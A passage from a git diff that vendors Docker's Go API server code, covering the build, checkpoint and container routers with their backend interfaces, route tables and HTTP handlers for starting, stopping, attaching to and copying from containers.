container.Isolation(r.FormValue("isolation")); i != "" { + if !container.Isolation.IsValid(i) { + return nil, fmt.Errorf("Unsupported isolation: %q", i) + } + options.Isolation = i + } + + if runtime.GOOS != "windows" && options.SecurityOpt != nil { + return nil, fmt.Errorf("the daemon on this platform does not support --security-opt to build") + } + + var buildUlimits = []*units.Ulimit{} + ulimitsJSON := r.FormValue("ulimits") + if ulimitsJSON != "" { + if err := json.Unmarshal([]byte(ulimitsJSON), &buildUlimits); err != nil { + return nil, err + } + options.Ulimits = buildUlimits + } + + var buildArgs = map[string]*string{} + buildArgsJSON := r.FormValue("buildargs") + + // Note that there are two ways a --build-arg might appear in the + // json of the query param: + // "foo":"bar" + // and "foo":nil + // The first is the normal case, ie. --build-arg foo=bar + // or --build-arg foo + // where foo's value was picked up from an env var. + // The second ("foo":nil) is where they put --build-arg foo + // but "foo" isn't set as an env var. In that case we can't just drop + // the fact they mentioned it, we need to pass that along to the builder + // so that it can print a warning about "foo" being unused if there is + // no "ARG foo" in the Dockerfile. + if buildArgsJSON != "" { + if err := json.Unmarshal([]byte(buildArgsJSON), &buildArgs); err != nil { + return nil, err + } + options.BuildArgs = buildArgs + } + + var labels = map[string]string{} + labelsJSON := r.FormValue("labels") + if labelsJSON != "" { + if err := json.Unmarshal([]byte(labelsJSON), &labels); err != nil { + return nil, err + } + options.Labels = labels + } + + var cacheFrom = []string{} + cacheFromJSON := r.FormValue("cachefrom") + if cacheFromJSON != "" { + if err := json.Unmarshal([]byte(cacheFromJSON), &cacheFrom); err != nil { + return nil, err + } + options.CacheFrom = cacheFrom + } + + return options, nil +} + +type syncWriter struct { + w io.Writer + mu sync.Mutex +} + +func (s *syncWriter) Write(b []byte) (count int, err error) { + s.mu.Lock() + count, err = s.w.Write(b) + s.mu.Unlock() + return +} + +func (br *buildRouter) postBuild(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var ( + authConfigs = map[string]types.AuthConfig{} + authConfigsEncoded = r.Header.Get("X-Registry-Config") + notVerboseBuffer = bytes.NewBuffer(nil) + ) + + if authConfigsEncoded != "" { + authConfigsJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authConfigsEncoded)) + if err := json.NewDecoder(authConfigsJSON).Decode(&authConfigs); err != nil { + // for a pull it is not an error if no auth was given + // to increase compatibility with the existing api it is defaulting + // to be empty. + } + } + + w.Header().Set("Content-Type", "application/json") + + output := ioutils.NewWriteFlusher(w) + defer output.Close() + sf := streamformatter.NewJSONStreamFormatter() + errf := func(err error) error { + if httputils.BoolValue(r, "q") && notVerboseBuffer.Len() > 0 { + output.Write(notVerboseBuffer.Bytes()) + } + // Do not write the error in the http output if it's still empty. + // This prevents from writing a 200(OK) when there is an internal error. + if !output.Flushed() { + return err + } + _, err = w.Write(sf.FormatError(err)) + if err != nil { + logrus.Warnf("could not write error response: %v", err) + } + return nil + } + + buildOptions, err := newImageBuildOptions(ctx, r) + if err != nil { + return errf(err) + } + buildOptions.AuthConfigs = authConfigs + + remoteURL := r.FormValue("remote") + + // Currently, only used if context is from a remote url. + // Look at code in DetectContextFromRemoteURL for more information. + createProgressReader := func(in io.ReadCloser) io.ReadCloser { + progressOutput := sf.NewProgressOutput(output, true) + if buildOptions.SuppressOutput { + progressOutput = sf.NewProgressOutput(notVerboseBuffer, true) + } + return progress.NewProgressReader(in, progressOutput, r.ContentLength, "Downloading context", remoteURL) + } + + out := io.Writer(output) + if buildOptions.SuppressOutput { + out = notVerboseBuffer + } + out = &syncWriter{w: out} + stdout := &streamformatter.StdoutFormatter{Writer: out, StreamFormatter: sf} + stderr := &streamformatter.StderrFormatter{Writer: out, StreamFormatter: sf} + + pg := backend.ProgressWriter{ + Output: out, + StdoutFormatter: stdout, + StderrFormatter: stderr, + ProgressReaderFunc: createProgressReader, + } + + imgID, err := br.backend.BuildFromContext(ctx, r.Body, remoteURL, buildOptions, pg) + if err != nil { + return errf(err) + } + + // Everything worked so if -q was provided the output from the daemon + // should be just the image ID and we'll print that to stdout. + if buildOptions.SuppressOutput { + stdout := &streamformatter.StdoutFormatter{Writer: output, StreamFormatter: sf} + fmt.Fprintf(stdout, "%s\n", string(imgID)) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go new file mode 100644 index 0000000000..8810f88b72 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go @@ -0,0 +1,10 @@ +package checkpoint + +import "github.com/docker/docker/api/types" + +// Backend for Checkpoint +type Backend interface { + CheckpointCreate(container string, config types.CheckpointCreateOptions) error + CheckpointDelete(container string, config types.CheckpointDeleteOptions) error + CheckpointList(container string, config types.CheckpointListOptions) ([]types.Checkpoint, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go new file mode 100644 index 0000000000..c1e93926f5 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go @@ -0,0 +1,36 @@ +package checkpoint + +import ( + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/router" +) + +// checkpointRouter is a router to talk with the checkpoint controller +type checkpointRouter struct { + backend Backend + decoder httputils.ContainerDecoder + routes []router.Route +} + +// NewRouter initializes a new checkpoint router +func NewRouter(b Backend, decoder httputils.ContainerDecoder) router.Router { + r := &checkpointRouter{ + backend: b, + decoder: decoder, + } + r.initRoutes() + return r +} + +// Routes returns the available routers to the checkpoint controller +func (r *checkpointRouter) Routes() []router.Route { + return r.routes +} + +func (r *checkpointRouter) initRoutes() { + r.routes = []router.Route{ + router.Experimental(router.NewGetRoute("/containers/{name:.*}/checkpoints", r.getContainerCheckpoints)), + router.Experimental(router.NewPostRoute("/containers/{name:.*}/checkpoints", r.postContainerCheckpoint)), + router.Experimental(router.NewDeleteRoute("/containers/{name}/checkpoints/{checkpoint}", r.deleteContainerCheckpoint)), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go new file mode 100644 index 0000000000..f988431191 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go @@ -0,0 +1,65 @@ +package checkpoint + +import ( + "encoding/json" + "net/http" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func (s *checkpointRouter) postContainerCheckpoint(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var options types.CheckpointCreateOptions + + decoder := json.NewDecoder(r.Body) + if err := decoder.Decode(&options); err != nil { + return err + } + + err := s.backend.CheckpointCreate(vars["name"], options) + if err != nil { + return err + } + + w.WriteHeader(http.StatusCreated) + return nil +} + +func (s *checkpointRouter) getContainerCheckpoints(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + checkpoints, err := s.backend.CheckpointList(vars["name"], types.CheckpointListOptions{ + CheckpointDir: r.Form.Get("dir"), + }) + + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, checkpoints) +} + +func (s *checkpointRouter) deleteContainerCheckpoint(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + err := s.backend.CheckpointDelete(vars["name"], types.CheckpointDeleteOptions{ + CheckpointDir: r.Form.Get("dir"), + CheckpointID: vars["checkpoint"], + }) + + if err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + return nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/backend.go b/vendor/github.com/docker/docker/api/server/router/container/backend.go new file mode 100644 index 0000000000..0d20188ccf --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/backend.go @@ -0,0 +1,79 @@ +package container + +import ( + "io" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/pkg/archive" +) + +// execBackend includes functions to implement to provide exec functionality. +type execBackend interface { + ContainerExecCreate(name string, config *types.ExecConfig) (string, error) + ContainerExecInspect(id string) (*backend.ExecInspect, error) + ContainerExecResize(name string, height, width int) error + ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) error + ExecExists(name string) (bool, error) +} + +// copyBackend includes functions to implement to provide container copy functionality. +type copyBackend interface { + ContainerArchivePath(name string, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error) + ContainerCopy(name string, res string) (io.ReadCloser, error) + ContainerExport(name string, out io.Writer) error + ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error + ContainerStatPath(name string, path string) (stat *types.ContainerPathStat, err error) +} + +// stateBackend includes functions to implement to provide container state lifecycle functionality. +type stateBackend interface { + ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) + ContainerKill(name string, sig uint64) error + ContainerPause(name string) error + ContainerRename(oldName, newName string) error + ContainerResize(name string, height, width int) error + ContainerRestart(name string, seconds *int) error + ContainerRm(name string, config *types.ContainerRmConfig) error + ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error + ContainerStop(name string, seconds *int) error + ContainerUnpause(name string) error + ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error) + ContainerWait(name string, timeout time.Duration) (int, error) +} + +// monitorBackend includes functions to implement to provide containers monitoring functionality. +type monitorBackend interface { + ContainerChanges(name string) ([]archive.Change, error) + ContainerInspect(name string, size bool, version string) (interface{}, error) + ContainerLogs(ctx context.Context, name string, config *backend.ContainerLogsConfig, started chan struct{}) error + ContainerStats(ctx context.Context, name string, config *backend.ContainerStatsConfig) error + ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) + + Containers(config *types.ContainerListOptions) ([]*types.Container, error) +} + +// attachBackend includes function to implement to provide container attaching functionality. +type attachBackend interface { + ContainerAttach(name string, c *backend.ContainerAttachConfig) error +} + +// systemBackend includes functions to implement to provide system wide containers functionality +type systemBackend interface { + ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error) +} + +// Backend is all the methods that need to be implemented to provide container specific functionality. +type Backend interface { + execBackend + copyBackend + stateBackend + monitorBackend + attachBackend + systemBackend +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/container.go b/vendor/github.com/docker/docker/api/server/router/container/container.go new file mode 100644 index 0000000000..bbed7e9944 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/container.go @@ -0,0 +1,77 @@ +package container + +import ( + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/router" +) + +type validationError struct { + error +} + +func (validationError) IsValidationError() bool { + return true +} + +// containerRouter is a router to talk with the container controller +type containerRouter struct { + backend Backend + decoder httputils.ContainerDecoder + routes []router.Route +} + +// NewRouter initializes a new container router +func NewRouter(b Backend, decoder httputils.ContainerDecoder) router.Router { + r := &containerRouter{ + backend: b, + decoder: decoder, + } + r.initRoutes() + return r +} + +// Routes returns the available routes to the container controller +func (r *containerRouter) Routes() []router.Route { + return r.routes +} + +// initRoutes initializes the routes in container router +func (r *containerRouter) initRoutes() { + r.routes = []router.Route{ + // HEAD + router.NewHeadRoute("/containers/{name:.*}/archive", r.headContainersArchive), + // GET + router.NewGetRoute("/containers/json", r.getContainersJSON), + router.NewGetRoute("/containers/{name:.*}/export", r.getContainersExport), + router.NewGetRoute("/containers/{name:.*}/changes", r.getContainersChanges), + router.NewGetRoute("/containers/{name:.*}/json", r.getContainersByName), + router.NewGetRoute("/containers/{name:.*}/top", r.getContainersTop), + router.Cancellable(router.NewGetRoute("/containers/{name:.*}/logs", r.getContainersLogs)), + router.Cancellable(router.NewGetRoute("/containers/{name:.*}/stats", r.getContainersStats)), + router.NewGetRoute("/containers/{name:.*}/attach/ws", r.wsContainersAttach), + router.NewGetRoute("/exec/{id:.*}/json", r.getExecByID), + router.NewGetRoute("/containers/{name:.*}/archive", r.getContainersArchive), + // POST + router.NewPostRoute("/containers/create", r.postContainersCreate), + router.NewPostRoute("/containers/{name:.*}/kill", r.postContainersKill), + router.NewPostRoute("/containers/{name:.*}/pause", r.postContainersPause), + router.NewPostRoute("/containers/{name:.*}/unpause", r.postContainersUnpause), + router.NewPostRoute("/containers/{name:.*}/restart", r.postContainersRestart), + router.NewPostRoute("/containers/{name:.*}/start", r.postContainersStart), + router.NewPostRoute("/containers/{name:.*}/stop", r.postContainersStop), + router.NewPostRoute("/containers/{name:.*}/wait", r.postContainersWait), + router.NewPostRoute("/containers/{name:.*}/resize", r.postContainersResize), + router.NewPostRoute("/containers/{name:.*}/attach", r.postContainersAttach), + router.NewPostRoute("/containers/{name:.*}/copy", r.postContainersCopy), // Deprecated since 1.8, Errors out since 1.12 + router.NewPostRoute("/containers/{name:.*}/exec", r.postContainerExecCreate), + router.NewPostRoute("/exec/{name:.*}/start", r.postContainerExecStart), + router.NewPostRoute("/exec/{name:.*}/resize", r.postContainerExecResize), + router.NewPostRoute("/containers/{name:.*}/rename", r.postContainerRename), + router.NewPostRoute("/containers/{name:.*}/update", r.postContainerUpdate), + router.NewPostRoute("/containers/prune", r.postContainersPrune), + // PUT + router.NewPutRoute("/containers/{name:.*}/archive", r.putContainersArchive), + // DELETE + router.NewDeleteRoute("/containers/{name:.*}", r.deleteContainers), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/container_routes.go b/vendor/github.com/docker/docker/api/server/router/container/container_routes.go new file mode 100644 index 0000000000..9c9bc0f8c3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/container_routes.go @@ -0,0 +1,554 @@ +package container + +import ( + "encoding/json" + "fmt" + "io" + "net/http" + "strconv" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/signal" + "golang.org/x/net/context" + "golang.org/x/net/websocket" +) + +func (s *containerRouter) getContainersJSON(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filter, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + config := &types.ContainerListOptions{ + All: httputils.BoolValue(r, "all"), + Size: httputils.BoolValue(r, "size"), + Since: r.Form.Get("since"), + Before: r.Form.Get("before"), + Filters: filter, + } + + if tmpLimit := r.Form.Get("limit"); tmpLimit != "" { + limit, err := strconv.Atoi(tmpLimit) + if err != nil { + return err + } + config.Limit = limit + } + + containers, err := s.backend.Containers(config) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, containers) +} + +func (s *containerRouter) getContainersStats(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + stream := httputils.BoolValueOrDefault(r, "stream", true) + if !stream { + w.Header().Set("Content-Type", "application/json") + } + + config := &backend.ContainerStatsConfig{ + Stream: stream, + OutStream: w, + Version: string(httputils.VersionFromContext(ctx)), + } + + return s.backend.ContainerStats(ctx, vars["name"], config) +} + +func (s *containerRouter) getContainersLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + // Args are validated before the stream starts because when it starts we're + // sending HTTP 200 by writing an empty chunk of data to tell the client that + // daemon is going to stream. By sending this initial HTTP 200 we can't report + // any error after the stream starts (i.e. container not found, wrong parameters) + // with the appropriate status code. + stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr") + if !(stdout || stderr) { + return fmt.Errorf("Bad parameters: you must choose at least one stream") + } + + containerName := vars["name"] + logsConfig := &backend.ContainerLogsConfig{ + ContainerLogsOptions: types.ContainerLogsOptions{ + Follow: httputils.BoolValue(r, "follow"), + Timestamps: httputils.BoolValue(r, "timestamps"), + Since: r.Form.Get("since"), + Tail: r.Form.Get("tail"), + ShowStdout: stdout, + ShowStderr: stderr, + Details: httputils.BoolValue(r, "details"), + }, + OutStream: w, + } + + chStarted := make(chan struct{}) + if err := s.backend.ContainerLogs(ctx, containerName, logsConfig, chStarted); err != nil { + select { + case <-chStarted: + // The client may be expecting all of the data we're sending to + // be multiplexed, so send it through OutStream, which will + // have been set up to handle that if needed. + fmt.Fprintf(logsConfig.OutStream, "Error running logs job: %v\n", err) + default: + return err + } + } + + return nil +} + +func (s *containerRouter) getContainersExport(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return s.backend.ContainerExport(vars["name"], w) +} + +func (s *containerRouter) postContainersStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + // If contentLength is -1, we can assumed chunked encoding + // or more technically that the length is unknown + // https://golang.org/src/pkg/net/http/request.go#L139 + // net/http otherwise seems to swallow any headers related to chunked encoding + // including r.TransferEncoding + // allow a nil body for backwards compatibility + + version := httputils.VersionFromContext(ctx) + var hostConfig *container.HostConfig + // A non-nil json object is at least 7 characters. + if r.ContentLength > 7 || r.ContentLength == -1 { + if versions.GreaterThanOrEqualTo(version, "1.24") { + return validationError{fmt.Errorf("starting container with non-empty request body was deprecated since v1.10 and removed in v1.12")} + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + c, err := s.decoder.DecodeHostConfig(r.Body) + if err != nil { + return err + } + hostConfig = c + } + + if err := httputils.ParseForm(r); err != nil { + return err + } + + checkpoint := r.Form.Get("checkpoint") + checkpointDir := r.Form.Get("checkpoint-dir") + if err := s.backend.ContainerStart(vars["name"], hostConfig, checkpoint, checkpointDir); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (s *containerRouter) postContainersStop(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var seconds *int + if tmpSeconds := r.Form.Get("t"); tmpSeconds != "" { + valSeconds, err := strconv.Atoi(tmpSeconds) + if err != nil { + return err + } + seconds = &valSeconds + } + + if err := s.backend.ContainerStop(vars["name"], seconds); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + + return nil +} + +type errContainerIsRunning interface { + ContainerIsRunning() bool +} + +func (s *containerRouter) postContainersKill(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var sig syscall.Signal + name := vars["name"] + + // If we have a signal, look at it. Otherwise, do nothing + if sigStr := r.Form.Get("signal"); sigStr != "" { + var err error + if sig, err = signal.ParseSignal(sigStr); err != nil { + return err + } + } + + if err := s.backend.ContainerKill(name, uint64(sig)); err != nil { + var isStopped bool + if e, ok := err.(errContainerIsRunning); ok { + isStopped = !e.ContainerIsRunning() + } + + // Return error that's not caused because the container is stopped. + // Return error if the container is not running and the api is >= 1.20 + // to keep backwards compatibility. + version := httputils.VersionFromContext(ctx) + if versions.GreaterThanOrEqualTo(version, "1.20") || !isStopped { + return fmt.Errorf("Cannot kill container %s: %v", name, err) + } + } + + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (s *containerRouter) postContainersRestart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var seconds *int + if tmpSeconds := r.Form.Get("t"); tmpSeconds != "" { + valSeconds, err := strconv.Atoi(tmpSeconds) + if err != nil { + return err + } + seconds = &valSeconds + } + + if err := s.backend.ContainerRestart(vars["name"], seconds); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (s *containerRouter) postContainersPause(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := s.backend.ContainerPause(vars["name"]); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (s *containerRouter) postContainersUnpause(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := s.backend.ContainerUnpause(vars["name"]); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (s *containerRouter) postContainersWait(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + status, err := s.backend.ContainerWait(vars["name"], -1*time.Second) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, &container.ContainerWaitOKBody{ + StatusCode: int64(status), + }) +} + +func (s *containerRouter) getContainersChanges(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + changes, err := s.backend.ContainerChanges(vars["name"]) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, changes) +} + +func (s *containerRouter) getContainersTop(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + procList, err := s.backend.ContainerTop(vars["name"], r.Form.Get("ps_args")) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, procList) +} + +func (s *containerRouter) postContainerRename(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + newName := r.Form.Get("name") + if err := s.backend.ContainerRename(name, newName); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (s *containerRouter) postContainerUpdate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + var updateConfig container.UpdateConfig + + decoder := json.NewDecoder(r.Body) + if err := decoder.Decode(&updateConfig); err != nil { + return err + } + + hostConfig := &container.HostConfig{ + Resources: updateConfig.Resources, + RestartPolicy: updateConfig.RestartPolicy, + } + + name := vars["name"] + resp, err := s.backend.ContainerUpdate(name, hostConfig) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, resp) +} + +func (s *containerRouter) postContainersCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + name := r.Form.Get("name") + + config, hostConfig, networkingConfig, err := s.decoder.DecodeConfig(r.Body) + if err != nil { + return err + } + version := httputils.VersionFromContext(ctx) + adjustCPUShares := versions.LessThan(version, "1.19") + + ccr, err := s.backend.ContainerCreate(types.ContainerCreateConfig{ + Name: name, + Config: config, + HostConfig: hostConfig, + NetworkingConfig: networkingConfig, + AdjustCPUShares: adjustCPUShares, + }) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, ccr) +} + +func (s *containerRouter) deleteContainers(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + config := &types.ContainerRmConfig{ + ForceRemove: httputils.BoolValue(r, "force"), + RemoveVolume: httputils.BoolValue(r, "v"), + RemoveLink: httputils.BoolValue(r, "link"), + } + + if err := s.backend.ContainerRm(name, config); err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (s *containerRouter) postContainersResize(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + height, err := strconv.Atoi(r.Form.Get("h")) + if err != nil { + return err + } + width, err := strconv.Atoi(r.Form.Get("w")) + if err != nil { + return err + } + + return s.backend.ContainerResize(vars["name"], height, width) +} + +func (s *containerRouter) postContainersAttach(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + err := httputils.ParseForm(r) + if err != nil { + return err + } + containerName := vars["name"] + + _, upgrade := r.Header["Upgrade"] + detachKeys := r.FormValue("detachKeys") + + hijacker, ok := w.(http.Hijacker) + if !ok { + return fmt.Errorf("error attaching to container %s, hijack connection missing", containerName) + } + + setupStreams := func() (io.ReadCloser, io.Writer, io.Writer, error) { + conn, _, err := hijacker.Hijack() + if err != nil { + return nil, nil, nil, err + } + + // set raw mode + conn.Write([]byte{}) + + if upgrade { + fmt.Fprintf(conn, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n\r\n") + } else { + fmt.Fprintf(conn, "HTTP/1.1 200 OK\r\nContent-Type: application/vnd.docker.raw-stream\r\n\r\n") + } + + closer := func() error { + httputils.CloseStreams(conn) + return nil + } + return ioutils.NewReadCloserWrapper(conn, closer), conn, conn, nil + } + + attachConfig := &backend.ContainerAttachConfig{ + GetStreams: setupStreams, + UseStdin: httputils.BoolValue(r, "stdin"), + UseStdout: httputils.BoolValue(r, "stdout"), + UseStderr: httputils.BoolValue(r, "stderr"), + Logs: httputils.BoolValue(r, "logs"), + Stream: httputils.BoolValue(r, "stream"), + DetachKeys: detachKeys, + MuxStreams: true, + } + + if err = s.backend.ContainerAttach(containerName, attachConfig); err != nil { + logrus.Errorf("Handler for %s %s returned error: %v", r.Method, r.URL.Path, err) + // Remember to close stream if error happens + conn, _, errHijack := hijacker.Hijack() + if errHijack == nil { + statusCode := httputils.GetHTTPErrorStatusCode(err) + statusText := http.StatusText(statusCode) + fmt.Fprintf(conn, "HTTP/1.1 %d %s\r\nContent-Type: application/vnd.docker.raw-stream\r\n\r\n%s\r\n", statusCode, statusText, err.Error()) + httputils.CloseStreams(conn) + } else { + logrus.Errorf("Error Hijacking: %v", err) + } + } + return nil +} + +func (s *containerRouter) wsContainersAttach(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + containerName := vars["name"] + + var err error + detachKeys := r.FormValue("detachKeys") + + done := make(chan struct{}) + started := make(chan struct{}) + + setupStreams := func() (io.ReadCloser, io.Writer, io.Writer, error) { + wsChan := make(chan *websocket.Conn) + h := func(conn *websocket.Conn) { + wsChan <- conn + <-done + } + + srv := websocket.Server{Handler: h, Handshake: nil} + go func() { + close(started) + srv.ServeHTTP(w, r) + }() + + conn := <-wsChan + return conn, conn, conn, nil + } + + attachConfig := &backend.ContainerAttachConfig{ + GetStreams: setupStreams, + Logs: httputils.BoolValue(r, "logs"), + Stream: httputils.BoolValue(r, "stream"), + DetachKeys: detachKeys, + UseStdin: true, + UseStdout: true, + UseStderr: true, + MuxStreams: false, // TODO: this should be true since it's a single stream for both stdout and stderr + } + + err = s.backend.ContainerAttach(containerName, attachConfig) + close(done) + select { + case <-started: + logrus.Errorf("Error attaching websocket: %s", err) + return nil + default: + } + return err +} + +func (s *containerRouter) postContainersPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + pruneFilters, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + pruneReport, err := s.backend.ContainersPrune(pruneFilters) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, pruneReport) +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/copy.go b/vendor/github.com/docker/docker/api/server/router/container/copy.go new file mode 100644 index 0000000000..ede6dff92c --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/copy.go @@ -0,0 +1,119 @@ +package container + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "net/http" + "os" + "strings" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "golang.org/x/net/context" +) + +// postContainersCopy is deprecated in favor of getContainersArchive. +func (s *containerRouter) postContainersCopy(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + // Deprecated since 1.8, Errors out since 1.12 + version := httputils.VersionFromContext(ctx) + if versions.GreaterThanOrEqualTo(version, "1.24") { + w.WriteHeader(http.StatusNotFound) + return nil + } + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + cfg := types.CopyConfig{} + if err := json.NewDecoder(r.Body).Decode(&cfg); err != nil { + return err + } + + if cfg.Resource == "" { + return fmt.Errorf("Path cannot be empty") + } + + data, err := s.backend.ContainerCopy(vars["name"], cfg.Resource) + if err != nil { + if strings.Contains(strings.ToLower(err.Error()), "no such container") { + w.WriteHeader(http.StatusNotFound) + return nil + } + if os.IsNotExist(err) { + return fmt.Errorf("Could not find the file %s in container %s", cfg.Resource, vars["name"]) + } + return err + } + defer data.Close() + + w.Header().Set("Content-Type", "application/x-tar") + if _, err := io.Copy(w, data); err != nil { + return err + } + + return nil +} + +// // Encode the stat to JSON, base64 encode, and place in a header. +func setContainerPathStatHeader(stat *types.ContainerPathStat, header http.Header) error { + statJSON, err := json.Marshal(stat) + if err != nil { + return err + } + + header.Set( + "X-Docker-Container-Path-Stat", + base64.StdEncoding.EncodeToString(statJSON), + ) + + return nil +} + +func (s *containerRouter) headContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + v, err := httputils.ArchiveFormValues(r, vars) + if err != nil { + return err + } + + stat, err := s.backend.ContainerStatPath(v.Name, v.Path) + if err != nil { + return err + } + + return setContainerPathStatHeader(stat, w.Header()) +} + +func (s *containerRouter) getContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + v, err := httputils.ArchiveFormValues(r, vars) + if err != nil { + return err + } + + tarArchive, 